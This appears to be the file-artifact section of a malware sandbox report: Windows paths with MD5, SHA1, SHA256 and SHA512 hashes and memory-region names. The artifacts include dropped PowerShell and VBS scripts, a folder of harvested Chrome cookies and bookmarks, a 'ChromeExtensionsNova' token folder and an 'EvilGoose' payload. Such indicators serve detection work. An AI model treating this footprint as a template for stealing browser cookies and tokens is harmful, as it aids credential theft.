C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\ur.pak
| MD5 | 861ffd74ae5b392d578b3f3004c94ce3 |
| SHA1 | 8a4a05317a0f11d9d216b3e53e58475c301d7ea5 |
| SHA256 | b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc |
| SHA512 | 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\zh-TW.pak
| MD5 | f466116c7ce4962fe674383d543c87f6 |
| SHA1 | f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e |
| SHA256 | ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b |
| SHA512 | 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\zh-CN.pak
| MD5 | 3210460a24f2e2a2edd15d6f43abbe5f |
| SHA1 | 608ff156286708ed94b7ae90c73568d6042e2dbd |
| SHA256 | 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605 |
| SHA512 | f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\vi.pak
| MD5 | 4076d3c0c0e5f31cf883198c980d1727 |
| SHA1 | db51b746216ea68803c98d7c1a5a2b45944359f3 |
| SHA256 | f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379 |
| SHA512 | 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\uk.pak
| MD5 | 381cb33c2d4fd0225c5c14447e6a84e0 |
| SHA1 | 686b888228f6dd95ade94fee62eb1d75f3e0fc93 |
| SHA256 | c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820 |
| SHA512 | f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\th.pak
| MD5 | 4917873d8118906bdc08f31afb1ea078 |
| SHA1 | 49440a3b156d7703533367f8f13f66ec166db6e9 |
| SHA256 | d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d |
| SHA512 | 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\te.pak
| MD5 | 17b858cf23a206b5822f8b839d7c1ea3 |
| SHA1 | 115220668f153b36254951e9aa4ef0aa2be1ffc4 |
| SHA256 | d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457 |
| SHA512 | 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\ta.pak
| MD5 | 5f80c9da0c09491c70123581a41f6dad |
| SHA1 | 3fc9560a954271cf09aaa54eec34963c72c06e85 |
| SHA256 | 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884 |
| SHA512 | 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\sw.pak
| MD5 | 59ff4e16b640ef41100243857efdd009 |
| SHA1 | f712b2d39618ffadcf68d1f2ab5a76da5be14d74 |
| SHA256 | c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804 |
| SHA512 | 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
C:\Users\Admin\AppData\Local\Temp\nsb6458.tmp\7z-out\locales\sv.pak
| MD5 | e4c9ced1a36ea7b71634e4df9618804f |
| SHA1 | c966c8eb9763a9147854989ea443c6be0634db27 |
| SHA256 | e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379 |
| SHA512 | d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e |
C:\Users\Admin\AppData\Local\Temp\184ba773-3dc3-422b-8c81-61a36d3fc007.tmp.node
| MD5 | 2373255d323030701424f4563282972b |
| SHA1 | 5cd382285aa117f13cdfe5686d6fce9dbd6b1b08 |
| SHA256 | 85c201a5cde6ea0aefd55cd1addc8df422bd99edfd714cedb38776ab490e23ec |
| SHA512 | bacce37be95f775447e8ec0516d11d501a1b76cedc896459b3fb5791c038786ba56cb2e95da13ef9a998ebe7b0caf738aae6bb22f46fb9c117db38ca6e9ed8df |
C:\Users\Admin\AppData\Local\Temp\6bc2fd44-6895-4c7b-8a0e-926eb15b8820.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\53b140d4-437b-4d00-bfa0-fd4324d08a40.tmp.node
| MD5 | fbad4161a3f9b06f7ce22dfe757a9daa |
| SHA1 | 6c24e8e478c4b531bd186bb9196f5afc739b7f5b |
| SHA256 | 9f9c33a83061d85ac6b53b85d925f29dcd3223fb093174d517e5c2aeb2900fd5 |
| SHA512 | 15f4e4c026f21c96daf2019f4a91a2003478e6c679cebd68ccfb83d48541f6934863bf5e92dd44b9555725f2551c633316ffe737406499cff9b0303d9f4a2d9d |
memory/2688-574-0x0000016CDCD30000-0x0000016CDCD52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vk3fmo0.3ho.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Temp\k02v5td4czh8_tezmp.ps1
| MD5 | 8fda5f0bdeea99d6b73711eb66663fa3 |
| SHA1 | 92c910fe8d4b5d72fe11fac44badca904fa5b041 |
| SHA256 | 7c37cc6da9df2bdd2e3d14617425775727aa40dc7876fc8f419ac479cb477387 |
| SHA512 | cc3659d34087f7d3c297141cce5d1e70beda6a74dde1a3aa17b2191dc00bfc67fdff4a1613e8250fe59472f58799545658a331df1c05ca3e4e64cb3da9757f3b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8d460ce715a00afd56cda62e926b8b17 |
| SHA1 | 3aa1ed2a3cd5e6e1a3240f222492c9e49c4eaf22 |
| SHA256 | 195c9d4857b9486e312f80264b31ef7e9ba014ececd7731397ee75ce8d8f38cb |
| SHA512 | 1b9efe45bea12e59e552dcce73d597ad431aa274621d96e5a3d146e28cfb11d9f5af256f0bc986e8d4d043f6352b9410d01ddb048bd57445f544502eaf28d969 |
C:\Users\Admin\AppData\Local\Temp\cpgKJgwynB302zg0MOsY\System\PKVHMXKI - 2024-06-13_001642.png
| MD5 | 7e4eebffd3a3e621d21c670d8f820716 |
| SHA1 | 8e9700a33d81ed5b28dc7c143d016d76c0042061 |
| SHA256 | 3830e299a134934059dba787e9f5794d71a1511762b92eb3fd38d943b23c69e4 |
| SHA512 | ce71b2dc4ad6ed2a5afb666cbd4fdfb436993f94bbf09639ad7fb505ef645bff0f8a230fd0efb72b1efc44d235ac92a79cf7ce95b919ec39aa11afc415ee0987 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip
| MD5 | 8310e29918ed689d395079820d4dbe59 |
| SHA1 | 6cd111d501d95072610f36b94c42534bedcbc973 |
| SHA256 | d960b2c1526b8d07a78507d046783e068f0e170afa11562967cffe45ae730990 |
| SHA512 | 2deb025fb711022e16df138f77eef2044dad6a1cb5b159dc69bda12edc2fa5f29f55a6681e5b8aa9c23d338e097104d5060d1ce6c7fbe186066165e5c87b6e3d |
C:\Users\Admin\AppData\Local\Temp\cpgKJgwynB302zg0MOsY\Browsers\Bookmarks.txt
| MD5 | 504550002e2aeaec8772fad83694828f |
| SHA1 | e8f559c17d15778816846aa469dad52d2571c410 |
| SHA256 | 039fdad54de24f737317055bdb5e562dafbee278bd9aaf35afbc4feb0a4fed6b |
| SHA512 | ea219755cfab64be19375b4b74436dc05358258ff838d180478736233c694c1a8498480ff6287ad634b9b22a9dbf21f9115a789cc58093b80905a8683d5e6bfc |
C:\Users\Admin\AppData\Local\Temp\cpgKJgwynB302zg0MOsY\Browsers\Chrome [ Default ] - Cookies.txt
| MD5 | 2ab3e9987e4f862f3a38f8c96ca9fd4f |
| SHA1 | 2971f105b8080ffb276d7e7549e138ea5d4bc3c8 |
| SHA256 | 1ee8c2c79957999dbc07f56a8e4fb0cde190a2c97a88f090ca82180457bf527a |
| SHA512 | 43d63d49ceca2b2a8f341556be6a98287b337e68b8ca2c8065d0ae3723ade1d184ad8c0500602d6c4bacb58f10645d0a3ccd1ec4b9b075b28b0cd218ba857dfa |
C:\Users\Admin\AppData\Roaming\Z6lb7Te0yUSq.vbs
| MD5 | e36e35df8521d4de1538768de7208030 |
| SHA1 | abea3eefe25abecf4ea499e1d3af3d61217c8efa |
| SHA256 | 0543bb58bc6a05b3af9ebd91f2a6823591b00064c18c68010b5a7442c9fe40e2 |
| SHA512 | 10fd1ded7e4ff475af9165d7687c97c26125ad59ec169fdc4e649d55ec0f69f373454cbaf43dfae92a7afcca43a70094d3d82b8747bd3e5d12523ce35df2a5d9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 73fc358d8c9ee00f6988071430ef5fa7 |
| SHA1 | cab8f4e76c0f85c029ccd00caf7725860122e760 |
| SHA256 | 1836044d1363e4adaf17efbe602096be2cbaf094ab3decb0fd2e551067dfc6f6 |
| SHA512 | 4f5ce853988e57e90c3c1210b2ce33d628cc8c495b06b20d3f4201141b29f6a8b5895f0bfc1ba6f3e67bd1d7d8926defe6bcb7e5418e7f4776a934e02387c8e1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2dcc306cb1a0d2dc0fd5971b059f67a0 |
| SHA1 | a25b818722bb8c84c2e8f4091c5fd563527dd14a |
| SHA256 | 97ae46cc802d3d92601c22e5edcc71ec41b9c522ec6e748dc7356beb14de2016 |
| SHA512 | c8a11fa5b58ac9256b6d6552a0228a54634f70023c93562ae3b5558374faebcc3da404e64e6cc2ed7b2d77b3505032d88d4eaf2474968aebd1e6f1fe089daeb0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a01e1ea821c8ff55a1417ec05ae3e8e0 |
| SHA1 | 58d08ebebf04e239cc68c81ec549fdd91801b606 |
| SHA256 | b9eb461dada313df29c1d0afd73faa6a19bb9649f46cbb3b198bdbe99883d8a2 |
| SHA512 | c53ab72660384fed533ad810244a02384092551683506aad35b7dbc5068a5fa0ea39f5d07f37e63894608d8d87818115d41069ba7fd4b58136f6a167108359d2 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png
| MD5 | 252b4fda07550496d330d819f15ceb3e |
| SHA1 | 650584312b310219a26d5fc20cb1804bb6c4dde5 |
| SHA256 | 39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d |
| SHA512 | a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png
| MD5 | c555604e8b6f818991e186342f856b1b |
| SHA1 | 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0 |
| SHA256 | 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972 |
| SHA512 | 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png
| MD5 | f0f11cd478cc44d518c16820ede9d253 |
| SHA1 | cfaf8d2e071f2ade0894578e5b44e02032d27be4 |
| SHA256 | 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb |
| SHA512 | ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8 |
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png
| MD5 | 2f0a6a34d9b95bba0e3358ddd41ff2ac |
| SHA1 | f39a9e7aeab9fe86fd9034284516de40186e6e93 |
| SHA256 | 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5 |
| SHA512 | a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 96ff1ee586a153b4e7ce8661cabc0442 |
| SHA1 | 140d4ff1840cb40601489f3826954386af612136 |
| SHA256 | 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8 |
| SHA512 | 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569 |
C:\Users\Admin\AppData\Roaming\salut9kB5O.ps1
| MD5 | 28e4eda7451c625bbe806b745753f729 |
| SHA1 | d29e9b2c2ac5b10188cbae92cffba6827728543d |
| SHA256 | da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba |
| SHA512 | 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5 |
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseDesktop.exe
| MD5 | c883e2c769ebe56240a71260b17f1b93 |
| SHA1 | 4a831d4f48f6ea81db508c2a87cf860acd17edb1 |
| SHA256 | 943fd1ea44266c5d7fa02f2b292db095a4e6ba8027a1f6c73fd60d1165e63aff |
| SHA512 | dae40d442794152285ce484b10095d11592a39cb1968bd38cc70ee23005bd1e04ad4312d7266107bdd375e10fa91ab9fd3d41d4d6ccd2268d052b343528c4376 |
memory/4092-955-0x00000000007E0000-0x000000000081E000-memory.dmp
memory/4092-956-0x0000000005280000-0x0000000005312000-memory.dmp
memory/4092-957-0x0000000005950000-0x0000000005EF4000-memory.dmp
memory/4092-958-0x0000000005200000-0x000000000520A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\GooseModdingAPI.dll
| MD5 | 9eb11041f2f11d939074e26b4b554088 |
| SHA1 | 50deec7591fcc5db40939543fc9bf92109f2df05 |
| SHA256 | efa31df7ab1394092395365805f913dd023cdcd21796603f133641524fb9ad79 |
| SHA512 | 2d07f40f56ae0dcaba51bc65e4617a0bfd67be13be5156fd7c2850645a461f87b97e46b2c596c21752df2aa488f6e6c329534a523bd7f88234be956b8af13bd1 |
memory/4092-963-0x0000000005420000-0x000000000542A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\config.ini
| MD5 | 072813d2253b25cbcd5858226f5f17a0 |
| SHA1 | c114c97f887e56efc0941ad37ffb3f6730195eac |
| SHA256 | cfeb29c3953c0a6ae97ab52d912311c94e0ab0df87c63ba32770ba4a714d0022 |
| SHA512 | a413ad200790b7a6f109213e73abf3eb20da0608b7b6826f5347e26b519c64581bebab3bf34c91c4aa7cc1181e73d8d824c1eec70aed07c222ef30bcc8779ee3 |
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Sound\NotEmbedded\Honk1.mp3
| MD5 | db2b7cf36003b2b653df6f3ca986e007 |
| SHA1 | d61a94c7b965dec3daa6351d849fa22f646edf8b |
| SHA256 | 56a240ddfbb494a6cb5c02a1271b5cc9a79217c53b481d9d3240b4973808d65b |
| SHA512 | 3c5ba0484567bd520334837c54df160b26d3a3be952474aedf23a946369bada58241dc43a471d8e9e652e0b682599f1c5dbd03e39fe8c1f6182b806b6939eef3 |
memory/4092-966-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-967-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-968-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-969-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-970-0x00000000079C0000-0x00000000079D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Sound\NotEmbedded\MudSquith.mp3
| MD5 | b2354d238829d09c54e272d8b4f60189 |
| SHA1 | 5a2731c04c50903d41f65d9fe5528a66cbefa289 |
| SHA256 | d5281ba99731fe3c443b6b2d18960a49e74b5b407956d3e1a3cde360f86573ba |
| SHA512 | aafbc687b5eac32fe1b4d838ab1ac88103d7f59d0b5f51519845abdd9ae37147e73143e6039719c3d06915107397e3e0a666d0cb1677cdbe05bccebea69ecaf9 |
memory/4092-972-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-973-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-974-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-975-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-976-0x00000000079C0000-0x00000000079D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Sound\Music\Music.mp3
| MD5 | ecd3eedd1f783552e35f5bec18887ff7 |
| SHA1 | ab75a39baf2311570db5a4d90566a8746fdecc01 |
| SHA256 | 652b3eb51dfc7cdd774b5c1103d69ae6c820190159d64cb477a4836096a639d7 |
| SHA512 | 14351e2f978f762982fd91f9e9ce6164f02e445b9de839ed603df67f0502863d6d34551401b675bd486d568adf509543fa55ac15eb7a1d77c2fd88ced109f994 |
memory/4092-978-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-981-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-980-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-979-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-982-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-983-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-984-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-985-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-987-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-986-0x00000000079C0000-0x00000000079D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C32\EvilGoose\hg\Assets\Images\Memes\donald-trump-dark-face-ez43cqrgo68gks0i.gif
| MD5 | 96817fd77b33db6f90d8972e1eaa5298 |
| SHA1 | 2e6578d75778fef9c8e8e3a190b69d9498697ff0 |
| SHA256 | ef0da9c54d727d3d855759b64c55b88489fd97512cbb7d838c3393875b21572d |
| SHA512 | 8ad5e0bf0a5fd55acad2f894d49f6566fdf633c1982fe9c88423fbb332ec17af4a15246d6158e8892c7773419045f1a758f9ec4e545ad2d328a564eb48cacfde |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8fd591b5d9a08e3faa3f4c6ff1666bc0 |
| SHA1 | 765bcba861cdc85c0ef6a816da42c498d4a94c35 |
| SHA256 | 4d395b906878e94ab46d561123f4a25ad741ab2ca2c09cc61ef54854ee859b7b |
| SHA512 | fc7f2ca2818772e1d36efa389ccd92277dd6ccfb5f1950d0d18a3dac691cf9b2213399d08d694a29c8f19cb4edf995f3da682e50ac78e18c447fba0af1bf3157 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1937c627875d42a0e3b95b95b9000da8 |
| SHA1 | ba6a8660cfdcd0897b73b431846c3b612bc734ab |
| SHA256 | 3a3525fe306f1939e767eb79c1a81dd798f566fa75f33d41a669e8a635c824b2 |
| SHA512 | f221e4513b76763f8a082548f7ca93651ef29f8cdd794e2a1c1744b592aea1e05aa7d9d47bfd0ffdc67430a09b2ce9cbfb053084866ae10fea1f2db12128b672 |
memory/4092-1277-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-1278-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-1280-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-1281-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-1279-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-2453-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-2457-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-2456-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-2455-0x00000000079C0000-0x00000000079D0000-memory.dmp
memory/4092-2454-0x00000000079C0000-0x00000000079D0000-memory.dmp